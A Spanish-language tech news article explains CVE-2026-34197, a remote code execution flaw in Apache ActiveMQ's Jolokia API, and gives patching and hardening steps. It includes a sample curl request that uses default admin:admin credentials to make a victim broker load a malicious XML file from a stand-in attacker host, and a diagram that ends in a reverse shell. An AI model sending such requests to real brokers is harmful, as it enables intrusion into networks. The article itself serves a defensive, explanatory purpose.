⏱️ Lectura: 10 min
La agencia estadounidense de ciberseguridad CISA sumó el CVE-2026-34197 a su catálogo de Known Exploited Vulnerabilities (KEV) el jueves 16 de abril de 2026, obligando a toda la rama ejecutiva civil del gobierno federal a parchar sus sistemas antes del 30 de abril. El detalle que llamó la atención a la comunidad de seguridad no es solo que la falla permita ejecución remota de código, sino que llevaba 13 años viviendo en el código fuente de Apache ActiveMQ sin que nadie se diera cuenta.
📑 En este artículo
El descubrimiento, reportado por el investigador Naveen Sunkavally de Horizon3.ai, combina dos factores que deberían encender alarmas en cualquier equipo de infraestructura: una API de administración bastante olvidada (Jolokia) y la persistencia de credenciales por defecto del tipo admin:admin en despliegues productivos. El resultado, en los escenarios más comunes en LATAM, es un RCE sin autenticación efectiva.
Qué pasó exactamente
Apache ActiveMQ es un message broker open source usado para mover datos entre aplicaciones: sistemas de pedidos hablando con facturación, microservicios compartiendo eventos, pipelines de datos bufferizando cargas. En LATAM es muy común encontrarlo en bancos, retailers, sistemas de gobierno electrónico y middleware heredado de la era Java EE. Su popularidad lo convierte en un blanco interesante cuando aparece una falla grave.
El 9 de abril de 2026, Horizon3.ai publicó detalles sobre CVE-2026-34197, una vulnerabilidad en el componente ActiveMQ Classic que permite a un usuario autenticado invocar operaciones de administración a través de la API Jolokia, engañando al broker para que descargue un archivo de configuración remoto y ejecute comandos arbitrarios del sistema operativo. En la práctica, convierte a un servicio de mensajería en un ejecutor remoto de comandos.
La Apache Software Foundation publicó parches en las versiones 5.19.5 y 6.2.3. Menos de dos semanas después, CISA confirmó que el bug ya estaba siendo explotado activamente y activó la directiva BOD 22-01, que le da a las agencias federales estadounidenses un plazo de 14 días para remediar o justificar formalmente por qué no pueden hacerlo.
⚠️ Ojo: Que la vulnerabilidad esté en KEV significa que ya hay atacantes explotándola en campañas reales, no que sea un riesgo teórico. En 2023 y 2024 ya vimos ransomware dirigido específicamente a ActiveMQ expuesto.
Cómo funciona técnicamente la vulnerabilidad
ActiveMQ incluye una API REST llamada Jolokia, que permite administrar beans JMX (Java Management Extensions) sobre HTTP/JSON. Jolokia existe desde hace años, se empaqueta en muchos productos Java y es convenientísima para operadores: podés leer métricas, reiniciar colas, cambiar parámetros de log, todo con un simple curl.
El problema es que Jolokia también expone operaciones que cargan archivos de configuración externos. Un atacante puede instruir al broker a obtener un XML malicioso desde una URL controlada y aplicarlo como configuración. Dentro de ese XML es posible incluir beans de Spring que, al inicializarse, ejecutan código arbitrario en el contexto del proceso Java.
Un ejemplo conceptual del flujo de explotación:
# 1. Atacante aloja un XML malicioso en su servidor
# http://atacante.example.com/evil.xml
# 2. Envía petición a la API Jolokia del ActiveMQ víctima
curl -u admin:admin -X POST \
http://victima.example.com:8161/api/jolokia/ \
-H "Content-Type: application/json" \
-d '{
"type": "exec",
"mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
"operation": "reloadConfiguration",
"arguments": ["http://atacante.example.com/evil.xml"]
}'
# 3. ActiveMQ descarga el XML y procesa los beans contenidos
# 4. El atacante obtiene RCE como el usuario que corre ActiveMQEl detalle delicado es que muchas instalaciones heredan el usuario y contraseña del jetty-realm.properties original: admin:admin o user:user. Si tu equipo nunca tocó esos archivos, estás en el peor escenario posible.
Versiones 6.0.0 a 6.1.1: aún más grave
En algunas versiones específicas, un bug previo catalogado como CVE-2024-32114 expone Jolokia sin ninguna autenticación. Combinado con el CVE-2026-34197, el resultado es una cadena de ejecución remota que no requiere credenciales de ningún tipo. Horizon3 lo resume sin rodeos: “en esas versiones, CVE-2026-34197 es efectivamente un RCE no autenticado”.
flowchart LR
A[Atacante] -->|POST Jolokia| B[ActiveMQ Broker]
B -->|fetch XML| C[Servidor malicioso]
C -->|devuelve config| B
B -->|ejecuta beans| D[Shell OS]
D -->|reverse shell| AContexto: ActiveMQ y su historial de ataques
ActiveMQ no es nuevo en el mundo de los incidentes de seguridad. En octubre de 2023, el CVE-2023-46604 permitió una ola masiva de infecciones con ransomware HelloKitty y criptomineros que abusaron de despliegues expuestos. En 2024, una banda clumsy —como la describió The Register— fue atrapada parchando la vulnerabilidad después de tomar control, para evitar que otros atacantes se metieran en la misma víctima.
La reiteración no es casualidad. ActiveMQ suele desplegarse en redes internas, pero muchas veces termina expuesto en internet por errores de configuración de firewall o por arquitecturas híbridas donde un broker tiene que hablar con integraciones externas. Una vez comprometido el broker, el atacante obtiene un pivote excelente: los brokers suelen tener credenciales en memoria para bases de datos, colas cifradas y sistemas internos.
📌 Nota: El CVE-2026-34197 fue descubierto con ayuda de Claude, el asistente de IA de Anthropic. Sunkavally lo usó para analizar la base de código de ActiveMQ buscando patrones de deserialización peligrosa. La era del vibe security research ya llegó.
Datos y cifras del impacto
- 13 años escondido en el código fuente antes de ser reportado.
- 8.000+ instancias de ActiveMQ expuestas a internet según ShadowServer.
- 14 días de plazo otorgados por CISA vía BOD 22-01 (hasta el 30 de abril de 2026).
- Versiones afectadas: todas las 5.x por debajo de 5.19.5 y 6.x por debajo de 6.2.3.
- Riesgo combinado con CVE-2024-32114 en 6.0.0–6.1.1: RCE sin credenciales.
Para dar escala: 8.000 brokers expuestos es aproximadamente el equivalente a 8.000 potenciales puntos de entrada a redes corporativas. Si asumimos que al menos el 10% mantiene credenciales por defecto —una tasa realista según reportes de Censys de los últimos años—, hablamos de unas 800 organizaciones con acceso trivial disponible para cualquier atacante con un escáner y ganas.
Qué hacer ahora: mitigación y parcheo
La recomendación oficial es actualizar a ActiveMQ 5.19.5 o 6.2.3. Sin embargo, en la mayoría de organizaciones de LATAM actualizar un broker productivo requiere ventana de mantenimiento, pruebas de compatibilidad con clientes JMS y aprobaciones de cambio. Mientras eso ocurre, hay medidas intermedias que bajan mucho el riesgo.
1. Rotar credenciales por defecto
Editá el archivo conf/jetty-realm.properties y reemplazá todos los usuarios por defecto. Nunca uses admin:admin, ni activemq:activemq, ni manager:manager.
# Linux / macOS
sed -i.bak 's/admin: admin/admin: TuPasswordFuerteAqui123!/' conf/jetty-realm.properties
# Windows (PowerShell)
(Get-Content conf\jetty-realm.properties) -replace 'admin: admin','admin: TuPasswordFuerteAqui123!' | Set-Content conf\jetty-realm.properties2. Desactivar Jolokia si no lo usás
Muchos equipos ni siquiera usan la consola web de ActiveMQ. Si es tu caso, comentá el connector de Jetty en conf/jetty.xml:
<!-- Comentar o remover el conector web si no se usa -->
<!--
<bean id="Server" destroy-method="stop" class="org.eclipse.jetty.server.Server">
...
</bean>
-->3. Restringir acceso de red
El puerto 8161 (consola/Jolokia) jamás debería estar expuesto a internet. Verificá tus reglas:
# Verificar exposición (Linux/macOS)
ss -tlnp | grep 8161
# Verificar en Windows
Get-NetTCPConnection -LocalPort 8161
# Bloquear acceso público con iptables
sudo iptables -A INPUT -p tcp --dport 8161 ! -s 10.0.0.0/8 -j DROP4. Monitorear logs de Jolokia
Buscá patrones sospechosos en los logs del broker, especialmente llamadas a reloadConfiguration o exec desde IPs no esperadas.
💡 Tip: Si usás Kubernetes con Helm chart oficial de ActiveMQ, revisá los valores por defecto del chart. Varias distribuciones siguen empaquetando credenciales débiles como default y las heredás sin darte cuenta.
Implicaciones para equipos en LATAM
En la región, ActiveMQ sigue siendo parte del stack de bancos, aseguradoras y sistemas de gobierno que modernizaron sus integraciones en la segunda mitad de los 2010. Muchos de esos despliegues fueron hechos por consultoras externas, quedaron en estado “funciona, no lo toques” y no reciben mantenimiento real desde hace años. Son exactamente el tipo de objetivo que busca el ransomware oportunista.
La lección del CVE-2026-34197 no es solo técnica: es operativa. Tener un inventario actualizado de software middleware, conocer qué versión corre cada servicio crítico y tener un canal claro para aplicar parches de emergencia es la diferencia entre parchar en 48 horas y enterarte por el equipo de incidentes tres semanas después.
📖 Resumen en Telegram: Ver resumen
Preguntas frecuentes
¿Qué es exactamente CVE-2026-34197?
Es una vulnerabilidad de ejecución remota de código en Apache ActiveMQ Classic que permite a un atacante con acceso a la API Jolokia obligar al broker a descargar y ejecutar un archivo de configuración malicioso, obteniendo ejecución de comandos arbitrarios en el sistema operativo subyacente.
¿Qué versiones están afectadas?
Todas las versiones de la rama 5.x anteriores a 5.19.5 y todas las versiones 6.x anteriores a 6.2.3. En las versiones 6.0.0 a 6.1.1, el problema se agrava porque otro bug (CVE-2024-32114) expone Jolokia sin autenticación.
¿Necesito credenciales válidas para explotar la falla?
Técnicamente sí, pero en la práctica muchas instalaciones usan las credenciales por defecto admin:admin, lo que hace trivial el acceso. Además, en ciertas versiones vulnerables al CVE-2024-32114, ni siquiera se requiere autenticación.
¿Cómo sé si mi ActiveMQ ya fue comprometido?
Revisá los logs del broker en busca de invocaciones inusuales a reloadConfiguration, descargas de archivos XML desde IPs externas, procesos hijos inesperados bajo el proceso Java y modificaciones recientes en archivos de configuración. Si encontrás evidencia, asumí compromiso y aislá el host.
¿CISA obliga a empresas privadas a parchar?
La directiva BOD 22-01 aplica solo a agencias federales civiles de Estados Unidos. Sin embargo, la inclusión en el catálogo KEV es usada como referencia por aseguradoras, auditores de cumplimiento y reguladores en todo el mundo, por lo que el efecto práctico se extiende al sector privado.
¿Puedo seguir usando ActiveMQ después de esto?
Sí. ActiveMQ sigue siendo un broker maduro y ampliamente usado. Lo importante es tener un proceso de parcheo continuo, no exponer la consola ni Jolokia a internet, y eliminar las credenciales por defecto desde el primer despliegue.
Referencias
- The Register — CISA tells feds to patch 13-year-old Apache ActiveMQ bug — Reporte original del 17 de abril de 2026 sobre la inclusión en KEV.
- Apache ActiveMQ — Sitio oficial del proyecto con releases 5.19.5 y 6.2.3.
- CISA Known Exploited Vulnerabilities Catalog — Catálogo KEV donde se registra CVE-2026-34197.
- NVD — CVE-2024-32114 — Bug relacionado que expone Jolokia sin autenticación en 6.0.0–6.1.1.
- Horizon3.ai — Firma de investigación que descubrió la vulnerabilidad.
📱 ¿Te gusta este contenido? Únete a nuestro canal de Telegram @programacion donde publicamos a diario lo más relevante de tecnología, IA y desarrollo. Resúmenes rápidos, contenido fresco todos los días.
0 Comentarios